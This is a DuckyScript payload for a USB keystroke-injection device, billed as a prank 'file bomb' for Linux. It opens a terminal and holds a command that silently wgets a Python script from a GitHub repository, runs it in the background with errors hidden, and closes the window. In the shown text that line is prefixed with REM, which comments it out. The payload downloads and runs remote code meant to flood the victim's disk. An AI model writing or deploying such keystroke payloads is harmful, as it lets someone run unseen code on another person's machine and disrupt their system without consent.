REM Title: File Bomb Tux style
REM Author: FalsePhilosopher
REM Target:  Unix-like tested on kubuntu 22.04.
REM Props: Hak5, PauloVicente89 for the py script I modified for linux and memes
REM Version: 1.0
REM Category: Prank
REM Launches a terminal, background wgets the py script and runs it.
REM
DELAY 300
REM Minimize all windows as that ensures launch happens smoother.
WINDOWS d
DELAY 300
CTRL-ALT t
DELAY 2000
REM STRING nohup wget https://github.com/FalsePhilosopher/BadUSB-Playground/raw/main/Ducky/USBRubberducky/library/prank/Unix-like/Linux/Bombs/File_bomb/PLTUX.py 2>/dev/null && python3 PLTUX.py 2>/dev/null & disown
ENTER
DELAY 500
ALT F4
